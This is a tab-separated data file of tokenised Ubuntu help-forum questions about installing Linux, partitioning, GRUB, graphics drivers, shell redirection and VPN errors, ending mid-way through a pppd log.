274296	unable to boot ubuntu/mint	i 'm posting this as a last resource i 'm really frustrated with the a new laptop i bought few months ago because i am just unable to install linux on it . it 's an hp pavilion g4 1364 . short specs : core i3 2,2ghz with intel graphics ( yuck ) , 4gb ram , 500gb hdd , radeon hd 7390m . not a really bad laptop , but the only distro i could install is fedora 18 in troubleshooting mode , which is bad because i do n't like fedora/red hat/cent os , etc since i 'm not really a linux power user ( and i hate gnome 3 also , although i know i can switch to cinnamon or mate , but thats not really a solution for me because i have always been an ubuntu guy , since 7.04 ) . i use linux mint at work and in my desktop , running ubuntu on a small netbook , never had a problem installing or booting any linux distro once in my life , except for this . tried ubuntu 12.10 from a live usb , normal booting did n't work at all ( it just gave me a black screen ) , although i could hear the unity login sounds after a while ( but still no screen ) . compatibility mode didnt work , it just kept telling me about a timeout in modprobe ( video related probably ) again and again . tried nomodeset , noacpi and all the options but no luck . tried mint 14 cinnamon from a live usb , normal booting did n't work , troubleshooting mode just kept telling me about a timeout in modprobe , like in ubuntu . tried mint 14 mate from a live usb , normal booting worked , troubleshooting mode just kept telling me about a timeout in modprobe , again , like in ubuntu . but after running the live mate live session , installing mint , rebooting and starting grub to boot mint , the system hangs . maybe my video card does n't like mdm ? ( theres no mdm on the live usb , that explains probably why mate worked fine on the liveusb , not sure ) tried fedora 18 , normal booting did n't work , troubleshooting mode worked with some errors . i 'm posting this from a linux mint mate live session , as wintendo does n't like my smartphone hotspot ( ridiculous ) . i bet this problem is related to the switchable-graphics ( also called `` hybrid graphics '' , depending on the vendor ) feature of my laptop . i tried with both setups in my bios , dynamic and static , and both have the same results . linux detects both , but uses only intel ( by reading the xserver log ) . by the way , i checked the md5 hash of my iso files , and i doubt my usb key is the problem . ubuntu was tried both , on a usb and a dvd . please help . i just ca n't not program waiting 4 seconds for a simple ajax call to return a value ( which happens in windows running xampp ) . a dessesperate linux user .
274297	ca n't redirect all output of program	i am attempting to redirect all output of a program ( steam ) to /dev/null so it does n't show up in the terminal . here 's what i 've tried : steam & > /dev/null 2 > /dev/null and steam & > /dev/null 2 > & 1 neither of which suppress it 's messages whatsoever ( as far as i can tell . ) my understanding is that & detaches the process from the terminal , and > redirects input/output , with the default/blank > being stdout and 2 > being stderr . are there more outputs than those two ? why am i still seeing output if i 'm redirecting all of it away ?
274301	how to turn down the brightness on my dell mini laptop ?	the keys that show the brightness symbols are 9 and 0 , but when i hold down shift and press these , it only shows ( and ) . help !
274305	how to run a sikulli java program written on windows platform on a linux/ubuntu server ?	i am a bit new with the sikulli tool so please bear with my ignorance . i have written a sikulli program on windows using java to automate the skype application , which works fine on windows . now i want to test the compatibility of this program on ubuntu server as is the requirement specified by the client . i am creating an executable jar out of my project and with the necessary code changes ( location changes for the skype application on ubuntu ) and trying to run it on ubuntu machine . is it possible to execute the same code out there for sikulli tool because when i try to run it on ubuntu ? i am getting null pointer exception where i am trying to open the skype application . the code will look something like this : : public static void main ( string [ ] args ) { screen mscreen = new screen ( ) ; sikuliscript browser = null ; try { browser = new sikuliscript ( ) ; } catch ( awtexception e1 ) { // todo auto-generated catch block e1.printstacktrace ( ) ; } // opening the skype app for the specified desktop application browser.openapp ( `` /home/speedcam/sikullitestimages/skype '' ) ; the last line in the code gives error as below : exception in thread `` main '' java.lang.reflect.invocationtargetexception at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:601 ) at org.eclipse.jdt.internal.jarinjarloader.jarrsrcloader.main ( jarrsrcloader.java:58 ) caused by : java.lang.nullpointerexception at org.sikuli.script.app.open ( app.java:73 ) at org.sikuli.script.app.open ( app.java:24 ) at org.sikuli.script.sikuliscript.openapp ( sikuliscript.java:50 ) at com.mindtree.sikuli.sikulidemo.main ( sikulidemo.java:35 ) ... 5 more can anyone help me with this ? also is the way i am trying to locate the skype app providing the path is correct or not ? thanks
274306	xorg.conf configuration help on ubuntu 12.04 ppc	i did the xorg -configure or x -configure and i have a xorg.conf file but with errors , so this is something i found out running ddcprobe : oem : nouveaufb memory : 7088kb edid : edid : 1 3 id : 2292 eisa : app2292 serial : 254c0002 manufacture : 46 2005 input : digital signal . screensize : 43 27 gamma : 2.200000 dpms : non-rgb , active off , suspend , no standby ctiming : 248x198 @ 111 dtiming : 1680x1050 @ 59 monitorserial : 2a5463wmufz monitorname : cinema it seems that ubuntu recognizes my monitor , but in the xorg.conf file it does n't show the same info on the monitors , here is what my xorg.conf shows about the monitors , and also why it does show two monitors , i have only one.. section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection and here is what it shows about the screens . section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` card1 '' monitor `` monitor1 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection how can i reconfigure ? why my monitor is showing double , and why is the screen double too ? some expert in xorg.conf advice needed . gus
274311	make a debian package ( .deb ) from a qt project	i did several projects on qt creator and i would like to distribute them in an installable format ( in this case , debian packages ) . more info about my qt installation ( and my system ) : qt version 4.8.0 ( 32 bit ) qt creator 2.4.1 i am running ubuntu 12.04 . any help is welcome !
274313	unable to play 1080p videos	i am dual booting windows and ubuntu ( 12.04 ) , and i am unable to play any videos ( 1080p ) on it , while on windows everything works fine . i have - -tried different media players ( vlc , movie player etc ) - tried to tweak performance settings after installing jupiter since i thought there might me some issues with power management - tweaking possible options in vlc ( hardware ones ) -removing and disabling any application which i found could be the cause of bug ( when i searched the forums ) the machine is a dell latitude d630 , dual core 32 bit at 1.8 ghz and 2 gb ram with discreet graphics intel 965gm .
274316	unable to install any software or package	i am recently shifted to ubuntu from windows and i installed ubuntu 12.04 32 bit i am unbale to install any packages like google talk plugins , teamviewer it flash a message `` package operation failed '' and while installing skype it shows the message `` dependency is not satisfiable skype bin '' . after trying lot with google unable to get any useful answer . thanks in advance
274323	problem in entering the login and password	i have installed the ubuntu 12.1 on vmware , but i am unable to login the system . its showing , that i can log in below but i ca n't enter the password ( its not taking ) but it is taking the username and it also telling to wait for the graphical environment to launch . kindly help to sort the issue .
274324	failed to load the package list bug	i keep receiving this error on my ubuntu system : e : read error-read ( 5 : input/output error ) , e : the package list or status file could not be parsed or opened how do i fix this ?
274326	kvm error in syslog says cpu0 unhandled rdmsr	i have a server that hosts about 20 kvm guest machines . it 's syslog is , at times , flooded with messages like these : 00:17:36 vhost-server kernel : [ 157.835078 ] kvm : 3138 : cpu0 unhandled rdmsr : 0xc0010112 mar 28 00:17:36 vhost-server kernel : [ 157.835108 ] kvm : 3138 : cpu0 unhandled rdmsr : 0xc0010048 mar 28 00:17:36 vhost-server kernel : [ 157.999164 ] kvm : 3138 : cpu0 unhandled rdmsr : 0xc0010001 mar 28 00:17:37 vhost-server kernel : [ 158.378247 ] kvm : 3179 : cpu0 unhandled rdmsr : 0xc0010112 mar 28 00:17:37 vhost-server kernel : [ 158.378277 ] kvm : 3179 : cpu0 unhandled rdmsr : 0xc0010048 mar 28 00:17:37 vhost-server kernel : [ 158.551881 ] kvm : 3179 : cpu0 unhandled rdmsr : 0xc0010001 mar 28 00:17:39 vhost-server kernel : [ 160.474937 ] kvm : 3508 : cpu0 unhandled rdmsr : 0xc0010112 mar 28 00:17:43 vhost-server kernel : [ 164.335746 ] kvm : 3342 : cpu0 unhandled rdmsr : 0xc0010112 mar 28 00:17:43 vhost-server kernel : [ 164.335752 ] kvm : 3342 : cpu0 unhandled rdmsr : 0xc0010048 mar 28 00:17:43 vhost-server kernel : [ 164.502836 ] kvm : 3342 : cpu0 unhandled rdmsr : 0xc0010001 mar 28 00:17:44 vhost-server kernel : [ 165.198538 ] kvm : 3392 : cpu0 unhandled rdmsr : 0xc0010112 mar 28 00:17:44 vhost-server kernel : [ 165.198545 ] kvm : 3392 : cpu0 unhandled rdmsr : 0xc0010048 mar 28 00:17:44 vhost-server kernel : [ 165.364203 ] kvm : 3392 : cpu0 unhandled rdmsr : 0xc0010001 mar 28 00:17:53 vhost-server kernel : [ 174.093009 ] kvm : 3731 : cpu0 unhandled rdmsr : 0xc0010112 things seem to be running fine . anyone have any idea what this is ?
274327	global menu on gnome classic 12.10	i want a global menu , you know , like the mac os x in my gnome classic session and i have tried both indicator-applet-globalmenu and indicator-globalmenu and nothing comes up in the add to panel box .
274328	create local repo for some applications	i have try to search over the internet but got nothing this is my situation , i have more than 30 vps running ubuntu server 12.04 i need to install openssh , webserver ( apache + php ) & database server ( mysql ) to all of this vps . unfortunately , my bandwidth is limited my question is : how to create local repo that contain needed application only so my other vps do n't need internet connection to install this application ? looking forward for your response
274329	install red5 server on an ubuntu12.04 server	i 've been struggling with this during 2 weeks without get it done . i 'm building a website where the users will have to record a video and post it as there cv and for this i need a rtmp server . i picked red5 cause it is free . this is the first time i 'm doing this , so i started to read some tutorials about how to install red5 server . but most of them are on a version of ubuntu older than the 12.04 . when i type the command to install java apt-get install java-package the server return unable to locate package java-package . and i need to install java ant and subversion before installing the red5 server . i 'm using putty on windows seven to get access to my server .
274330	cairo dock problem	i installed cairo dock but it seems like it does n't work correctly . the icon does n't show correctly .
274332	how to create partition without formatting drive ?	i am have some doubts in partition my external drive . i am have external drive of capacity 2tb formatted in ntfs . 1.5 tb is used in hard drive . i want to create one partition of 200 gb in fat . but i do n't want to format my drive . and i do n't have system capacity to backup all of my 1.5 tb data . i was wondering is there any way to create a fat partition on my external hdd in ubuntu without formatting and losing data from hard drive .
274338	developing native apps for ubuntu phone and tablet	i wan na know which language should i use to develop native apps on ubuntu phone/tablet/tv ? also , which ide to use ? shall i understand that ubuntu apps on pc could be easily ported on tablet and phone as well ?
274341	why do i have to reinstall video drivers on kernel updates ?	i understand that the drivers are compiled into the kernel but why is the api so tightly coupled to the kernel ? can i install the drivers in a way so i do n't have to reinstall the drivers every time there is an update ? the fact i can use the driver again and compile it means the driver is valid . then why do i need to do this manually ? link to driver i use its amd catalystâ˘ 13.1 proprietary linux x86 display driver amd radeon hd 7700 series currently running linux 3.5.0-25-generic # 39-ubuntu smp x86_64 x86_64 x86_64 gnu/linux
274345	ubuntu 11.10 bootloader does n't start windows 7	i just installed ubuntu 11.10 alongside with windows 7 . ubuntu starts and work fine . instead , when i click on the last option : windows 7 ( loader ) ( on /dev/sda1 ) the bootloader reload itself and does n't start windows 7 ! so now i can only use ubuntu ! for me ubuntu is good etc , but i like also to use windows if possible ... can you help me ? here 's my boot info script : http : //paste.ubuntu.com/5655022/
274346	clustering and cuda . is it possible ?	i am considering following this guide : building your own supercomputer using ubuntu and kerrighed : http : //www.stevekelly.eu/cluster.shtml if i put say multiple cheap nvidia cards on each of the nodes would i be able to run software that can use cuda and benefit from all of the gpus ? i presume that this method will allow me add nodes as and when i can afford/like ?
274347	decrypting *.so file	situation : long back i developed some coding in c and c++ , by converting to *.so file - i deleted those c and c++ files . issue : i want to re-convert the *.so files into c and c++ files for the code upgradation , please guide for the procedure and send any tutorial and procedure for re-conversion .
274349	getting cpu usage realtime	when i execute following command to get cpu usage , i get nice + user cpu usage . top -b -n1 | grep `` cpu ( s ) '' | awk ' { print $ 2 + $ 4 } ' output : 14.5 here i am getting problem is that the output depends on top command thus it does n't change instantly as top command . so i am not getting correct cpu instantly . it gives same output and not changing . i want to get real-time cpu usage in output . please help me to improve my command .
274351	grub does not update	i edit : /boot/grub/menu.lst and /etc/default/grub , but the terminal did not allow to update the grub the code from the terminal : user @ user-desktop : ~ $ sudo update-grub /etc/default/grub : 29 : menuentry : not found
274353	wget downloads only 5 bytes file	i 've got the following issue - the wget command downloads only 5bytes of files on the remote server i need to access . i know , that the files have 5mb and 1.3mb , so why after wget'ing them i receive only 5b empty files ? ===edit=== root @ app : # wget -c -v xxx.x.x.xxx:139/dbase/dispense.log -- 2013-03-28 09:10:27 -- http : //xxx.x.x.xxx:139/dbase/dispense.log connecting to xxx.x.x.xxx:139 ... connected . http request sent , awaiting response ... 200 no headers , assuming http/0.9 length : unspecified saving to : `dispense.log' [ < = > ] 5 -- .-k/s in 0s 2013-03-28 09:10:27 ( 846 kb/s ) - `dispense.log ' saved [ 5 ]
274356	does calligra have a ppa for ubuntu 12.04 ?	in ubuntu 12.04 calligra is 2.4 . now the newest is 2.6 . does calligra have a ppa for ubuntu 12.04 ? thanks
274358	apt autoremove old packages	how to autoremove all installed packages and not existed in repositories ? example : after several dist-upgrades there is many libs ( libapt-inst1.3 libapt-inst1.4 libapt-inst1.5 , great count of libdnsxx etc ) .
274362	what 's the most effective way to suggest ubuntu something ?	for very dummy people who would like to send suggestions , what would be the easiest and more effective way to ask ? this is for 12.04 and newer versions . maybe also older versions
274367	how to speedup the rendering of the onboard on screen keyboard in the unlock screen ?	i have a panel-pc with a touch-screen and are using ubuntu 12.04 lts . when the screen is locked and then touched the lock-screen is shown but the onboard osk is not rendered yet . this takes a second or so . how do i make the rendering of the osk faster ? or even better : how can i make the onboard osk already active on the lock-screen ?
274368	formatting hard drive failed	i am fairly new to ubuntu , so please don bite my head off if i ask a stupid question . anyway , i tried formatting one of my hard drives using the gnome disks tool , and that returned an error . error creating file system : command-line `mkntfs -f -f -l `` new volume '' `` /dev/sdb '' ' exited with non-zero exit status 1 : stdout : `cluster size has been automatically set to 4096 bytes . creating ntfs volume structures. ' stderr : `/dev/sdb is entire device , not just one partition . mkntfs forced anyway . error writing to /dev/sdb : input/output error error writing non-resident attribute value . add_attr_sd failed : input/output error could n't create root directory : input/output error failed to fsync device /dev/sdb : input/output error warning : could not close /dev/sdb : input/output error ' ( udisks-error-quark , 0 ) i have no idea what this error means , and how i should format my hard drive ( if i am still able to ) . does this mean that my hard drive is fried and that i can just throw it out , or can i still save it ? edit : using sudo fdisk -l returns the following output : disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00084eb8 device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 312580095 156039169 5 extended /dev/sda5 501760 312580095 156039168 8e linux lvm disk /dev/sdc : 82.0 gb , 81964302336 bytes 255 heads , 63 sectors/track , 9964 cylinders , total 160086528 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xd30c01f2 device boot start end blocks id system /dev/sdc1 2048 160083967 80040960 7 hpfs/ntfs/exfat disk /dev/mapper/ubuntu-root : 237.4 gb , 237447938048 bytes 255 heads , 63 sectors/track , 28868 cylinders , total 463765504 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu-root does n't contain a valid partition table disk /dev/mapper/ubuntu-swap_1 : 4294 mb , 4294967296 bytes 255 heads , 63 sectors/track , 522 cylinders , total 8388608 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ubuntu-swap_1 does n't contain a valid partition table but this does not contain the hard drive i am trying to format , as it seems . the other two devices that show up ( /dev/sda and /dev/sdc ) are the ones i have combined into one logical view . the third one , or i should say the second one ( /dev/sdb ) never shows up in this list , but only shows up in the gnome disks utility . formatting it from the command line , as well as formatting it from the utillity returns the same result . edit 2 : using sudo parted -l returned the following : model : ata maxtor stm316021 ( scsi ) disk /dev/sda : 160gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 256mb 255mb primary ext2 boot 2 257mb 160gb 160gb extended 5 257mb 160gb 160gb logical lvm error : /dev/sdb : unrecognised disk label model : ata maxtor 6y080l0 ( scsi ) disk /dev/sdc : 82.0gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 82.0gb 82.0gb primary model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/ubuntu-root : 237gb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 237gb 237gb ext4 model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/ubuntu-swap_1 : 4295mb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 4295mb 4295mb linux-swap ( v1 ) as shows , my /dev/sdb device is unrecognized ( error : /dev/sdb : unrecognised disk label ) . this should bring me a bit closer to the solution , if only i knew what to do with this . edit 3 : after some further research , it turns out that my hard drive doesn have a partition table , and i ca n't create one on the device , because my computer detects it as if it were a zero-length partition . i 'll have to cut my losses and just accept the fact that it 's dead . thanks anyway for being helpful .
274371	install on second hard drive with startup boot option ?	in theory , what i want to do is very simple , but i 've done some google research and read some posts on this site and i 'm still confused . i want to keep win7 on my primary c : \ drive , and install ubuntu ( 12.10 ) on a secondary drive ( that i have yet to buy or install ... just want to know 100 % that i 'm not going to screw the pooch when i do this ) . if at all possible i 'd also like it such that when i start the computer i have the option to boot either win7 or ubuntu , like an account log in type thing where i just pick which drive i 'm running with that day . and just to reiterate , i do not want to partition my c : \ drive or alter , change , or affect my win7 system in anyway . the reason i 'm still fairly uncertain about all of this , is that a lot of the guides i 've read have been for ubuntu 9 something or ubuntu 10 something or other . also the vast majority of guides are about partitioning one drive to fit both os ' . i want two separate os running from two separate drives that i can pick at boot . the guides i did find mentioned that there is some issue with the grub being installed on c : \ but the rest of the os being installed on the other drive ... is this still the case ? how do i avoid that ? also , if it helps , i 've been running 12.04lts on my laptop for a few months now in class and what nots and i love it . finally , if you could please point me to a guide or write your answer in the form of a guide for a two year old that 'd be awesome . i 'm still an ubuntu noob and i do n't want to mess up my win7 . thanks in advance and sorry if this is a duplicate or something .
274373	gtk3 apps fails to launch from terminal : `` runtimeerror : gtk could n't be initialized '' from term but ok from unity launcher	usually at work i lock my screen when i leave , log off once a week , and rarely reboot . all my packages are up-to-date . yesterday i rebooted , and this morning i ca n't launch my python3/gtk3 apps : jeancoiron @ myhostname : /opt/myapps/dev $ ./mywindow.py traceback ( most recent call last ) : file `` ./mywindow.py '' , line 4 , in < module > from gi.repository import gtk file `` /usr/lib/python3/dist-packages/gi/importer.py '' , line 76 , in load_module dynamic_module._load ( ) file `` /usr/lib/python3/dist-packages/gi/module.py '' , line 224 , in _load overrides_modules = __import__ ( 'gi.overrides ' , fromlist= [ self._namespace ] ) file `` /usr/lib/python3/dist-packages/gi/overrides/gtk.py '' , line 1533 , in < module > raise runtimeerror ( `` gtk could n't be initialized '' ) runtimeerror : gtk could n't be initialized code of this example app : # ! /usr/bin/python3 # filename : mywindow.py from gi.repository import gtk from gi.repository import gdk class mywindow ( gtk.window ) : def __init__ ( self ) : gtk.window.__init__ ( self , title= '' my window '' ) self.maingrid = gtk.grid ( ) self.add ( self.maingrid ) self.lbl = gtk.label ( `` hello world '' ) self.maingrid.add ( self.lbl ) mainwin = mywindow ( ) mainwin.connect ( `` delete-event '' , gtk.main_quit ) mainwin.show_all ( ) gtk.main ( ) if i launch it from geany it works , not from a standard terminal . same for all my python3/gtk3 apps . from a geany terminal echo $ path is exactly the same as from a standard terminal . curently display=':0 ' , i tried with no display var and with display='localhost:0' any idea where i should search ? -edit- this is a gtk issue only : i can launch gtk apps like gedit from unity launcher but not from a terminal . jeancoiron @ myhostname : /opt/myapps/dev $ gedit /usr/lib/python3/dist-packages/gi/overrides/gtk.py can not open display : run 'gedit -- help ' to see a full list of available command line options . jeancoiron @ myhostname : /opt/myapps/dev $ echo $ display :0
274378	i ca n't save my vim file ?	i 'm new in vim editor , and i want to know how to save a file after editing , i entered : x after finishing my modification , but nothing is happening ! ! so where should i put this command : x to be executed ! thank you
274382	how to create a lvm partition/physical volume > 2tb	i was following this tutorial found here : how to set up multiple hard drives as one volume ? which was working out great however i have a 3tb drive and every time i create the partition ( whether it be via fdisk or gparted ) , after i start creating the volumes in lvm , my partition is re-sized to 2tb and the partition table becomes msdos which does n't allow me to create any more partitions or to extend the current partition . is there a way that i can get a 3tb drive working with lvm ? thanks , adam
274387	what 's alternative hjsplit software for ubuntu ?	i 've downloaded hjsplit for linux on official website but when i tried it 's does n't working . can anyone give me recommendation alternative for join or split file software ?
274388	how can i upgrade from gnome-shell 3.4.2 to 3.8 ?	i have ubuntu 12.04 and i installed gnome-shell that 's version is 3.4.2 . now the gnome 3.8 has been released and i would like to upgrade my gnome-shell to 3.8 .
274397	how do i install maple software in linux ubuntu ?	i am new to ubuntu and i was wondering if anyone could show me a tutorial or actually show me how to install software , for example maple software or things like that . thanks .
274402	how do i remotely reboot my computer if i have an encrypted hdd	i have set up our new server at work to have an encrypted hdd . at start up it asks for our password before booting . great . except it has just dawned on me that we ssh in to the server all the time . what if i need to restart the machine remotely or the power goes out over the weekend . is there a way around this ? i would still like to have the entire disk encrypted . thanks
274404	expanding the current running operating system partition	i have dual booted my pc from windows to ubuntu 12.10v . i actually had done it by shrinking the 500gb volume to half a part to windows and half to ubuntu . now i am facing an issue called low disk space . how to extend my boot partition , sounds funny , because i already have a space capacity of 250gb assigned for ubuntu . here is my disk-free status pradeep @ : ~ $ df filesystem 1k-blocks used available use % mounted on /dev/loop0 17884496 16096924 879080 95 % / udev 1966728 4 1966724 1 % /dev tmpfs 790388 792 789596 1 % /run none 5120 0 5120 0 % /run/lock none 1975964 464 1975500 1 % /run/shm none 102400 16 102384 1 % /run/user /dev/sda5 233138172 19311152 213827020 9 % /host now the /dev/sd5 captured my whole volume.. how to make it use for my root
274406	how to get the correct partition to boot	i have just installed ubuntu into one of two 60gb partitions on my hard disc . i think it is sda2 and that the other partition ( sda1 ) contains a failed installation of ubuntu . sda2 is further divided into sda6 ( 59gb ) and sda5 ( swap space ) , so can i conclude that the working copy of ubuntu is in sda2 ? the disk utility tells me that sda1 is not mounted and bootable , and sda6 is mounted at / but the partition flag just says â-â . how can i delete the failed installation and ensure that i can still boot , please ?
274414	how can i export books from ubuntu to amazon kindle ?	i have tried the amazon kindle hd 7 '' , but could not integrate it at all with my ubuntu 12.04 lts os . i have tried the usb cable but it did n't show up on the screen and i have tried to connect it via bluetooth , but it also did n't work . i have calibre installed on my ubuntu , but could not integrate it/export books to kindle . i have also tried to use ubuntu one , but amazon has its own cloud system . does anyone of you have any solution for these problems ? thanks very much !
274418	recover from crashed session	occasionally , my laptop dumps me out to a blank screen with an 'hid ' error , indicating a problem with the mouse driver . short of actually fixing the underlying cause , which i have tried to do , how can i recover from this , and get back to , or start a new gui session ? i know i can hit ctrl-alt-f1 and get to a terminal prompt and log in . but what do i do from there ? i tried entering init 3 , and then init 5 , but that does n't get me to a login screen . i hate rebooting and losing everything .
274420	error connecting to fortinet vpn	i am running ubuntu 12.10 and trying to connect to a fortinet vpn server . i use forticlientsslvpn_linux_4.0.2254 . when i try to connect , error occurs during the ppp negotiation ( got message discarded non-lcp packet when lcp not open and timeout sending config-requests ) . i believe the problem is not on the network , because i can connect perfectly fine using my mac machine from the same network . below are messages from forticlientsslvpn.log and syslog . thanks in advance ! ** forticlientsslvpn.log : 03/28/2013 12:08:15 [ 15031 ] set the loglevel to 1 03/28/2013 12:08:15 [ 15031 ] sslvpn connection version:4.0.2254 03/28/2013 12:08:15 [ 14929 ] set the loglevel to 1 03/28/2013 12:08:15 [ 15031 ] rcv cmd:0 at state [ 0 ] 03/28/2013 12:08:15 [ 15031 ] starting ssl vpn tunnel [ 4.0.2254 ] no gateway found for vpn.server.net . trying our own interface gateway for 1.1.1.1:192.168.123.254 for vpn.server.net : if has single route record for 1.1.1.1:0 for vpn.server.net:0 03/28/2013 12:08:15 [ 15057 ] execl /home/user/forticlientsslvpn/./helper/get_fortisslvpn_info /home/user/forticlientsslvpn/./helper vpn.server.net 10443 ... 03/28/2013 12:08:15 [ 15057 ] set loglevel to 1 03/28/2013 12:08:33 [ 15057 ] no content-length 03/28/2013 12:08:35 [ 15057 ] no content-length 03/28/2013 12:08:35 [ 15057 ] no content-length 03/28/2013 12:08:36 [ 15057 ] no content-length 03/28/2013 12:08:36 [ 15057 ] 0|vpn.server.net|10443|1|10.10.0.0/255.255.0.0 , [ truncated ] |+ [ truncated ] == % 0a 03/28/2013 12:08:36 [ 15031 ] ssl vpn tunnel started 03/28/2013 12:08:36 [ 15060 ] server=vpn.server.net [ vpn.server.net ] port=10443 [ 10443 ] version=1 tunnel=10.10.0.0/255.255.0.0 , [ truncated ] cookie= [ truncated ] == % 0a 03/28/2013 12:08:36 [ 15060 ] starting pppd 03/28/2013 12:08:36 [ 15060 ] use tty : /dev/pts/7 03/28/2013 12:08:36 [ 15060 ] connecting to vpn.server.net:10443 03/28/2013 12:08:53 [ 15060 ] pppd may die ... trying to fix it 03/28/2013 12:08:53 [ 15060 ] pppd may die ... trying to fix it 03/28/2013 12:09:29 [ 15060 ] read error from tty [ ] 03/28/2013 12:09:29 [ 15060 ] rcv frame from tty fail 03/28/2013 12:09:52 [ 15060 ] ppp interface is not up ! ! ! 03/28/2013 12:09:52 [ 15060 ] io finished , kill pppd 03/28/2013 12:09:52 [ 15060 ] kill_child:15064 03/28/2013 12:09:52 [ 15060 ] tunnel finished , killing session 03/28/2013 12:09:52 [ 15060 ] killing pppd ... 03/28/2013 12:09:52 [ 15031 ] tunnel terminated 03/28/2013 12:09:52 [ 15031 ] tunnel down unexpected 03/28/2013 12:09:52 [ 15031 ] kill_child:15057 03/28/2013 12:09:52 [ 15057 ] signal rcved , logout now begin cleanup linux ... restore /etc/resolv.conf clean up route ... truncate pppd.log truncate forticlientsslvpn.log 03/28/2013 12:09:52 [ 15031 ] select : interrupted system call 03/28/2013 12:09:52 [ 15031 ] rcv cmd:1 at state [ 0 ] 03/28/2013 12:09:52 [ 15031 ] rcv cmd:2 at state [ 0 ] ** syslog mar 28 12:08:36 thinkpad pppd [ 15064 ] : pppd 2.4.5 started by root , uid 0 mar 28 12:08:36 thinkpad pppd [ 15064 ] : using channel 30 mar 28 12:08:36 thinkpad pppd [ 15064 ] : using interface ppp0 mar 28 12:08:36 thinkpad pppd [ 15064 ] : connect : ppp0 < -- > /dev/pts/7 mar 28 12:08:36 thinkpad pppd [ 15064 ] : sent [ lcp confreq id=0x1 < mru 1024 > < magic 0xae51a48 > ] mar 28 12:08:36 thinkpad networkmanager [ 1368 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) mar 28 12:08:36 thinkpad networkmanager [ 1368 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . mar 28 12:08:36 thinkpad networkmanager [ 1368 ] : < warn > /sys/devices/virtual/net/ppp0 : could n't determine device driver ; ignoring ... mar 28 12:08:39 thinkpad pppd [ 15064 ] : sent [ lcp confreq id=0x1 < mru 1024 > < magic 0xae51a48 > ] mar 28 12:08:52 pppd [ 15064 ] : last message repeated 4 times mar 28 12:08:52 thinkpad pppd [ 15064 ] : rcvd [ lcp confreq id=0x1 < magic 0x8f45618f > ] mar 28 12:08:52 thinkpad pppd [ 15064 ] : sent [ lcp confack id=0x1 < magic 0x8f45618f > ] mar 28 12:08:52 thinkpad pppd [ 15064 ] : rcvd [ lcp confack id=0x1 < mru 1024 > < magic 0xae51a48 > ] mar 28 12:08:52 thinkpad pppd [ 15064 ] : sent [ ccp confreq id=0x1 < deflate 15 > < deflate ( old # ) 15 > < bsd v1 15 > ] mar 28 12:08:52 thinkpad pppd [ 15064 ] : sent [ ipcp confreq id=0x1 < compress vj 0f 01 > < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns2 0.0.0.0 > ] mar 28 12:08:53 thinkpad pppd [ 15064 ] : rcvd [ lcp confack id=0x1 < mru 1024 > < magic 0xae51a48 > ] mar 28 12:08:53 thinkpad pppd [ 15064 ] : rcvd [ lcp confack id=0x1 < mru 1024 > < magic 0xae51a48 > ] mar 28 12:08:53 thinkpad pppd [ 15064 ] : rcvd [ lcp confreq id=0x1 < mru 1024 > < magic 0xae51a48 > ] mar 28 12:08:53 thinkpad pppd [ 15064 ] : sent [ lcp confreq id=0x2 < mru 1024 > < magic 0x6b7efcd0 > ] mar 28 12:08:53 thinkpad pppd [ 15064 ] : sent [ lcp confack id=0x1 < mru 1024 > < magic 0xae51a48 > ] mar 28 12:08:53 thinkpad pppd [ 15064 ] : rcvd [ lcp confack id=0x1 < mru 1024 > < magic 0xae51a48 > ] mar 28 12:08:53 thinkpad pppd [ 15064 ] : rcvd [ lcp confack id=0x1 < mru 1024 > < magic 0xae51a48 > ] mar 28 12:08:53 thinkpad pppd [ 15064 ] : rcvd [ lcp confreq id=0x1 < mru 1024 > < magic 0xae51a48 > ] mar 28 12:08:53 thinkpad pppd [ 15064 ] : sent [ lcp confack id=0x1 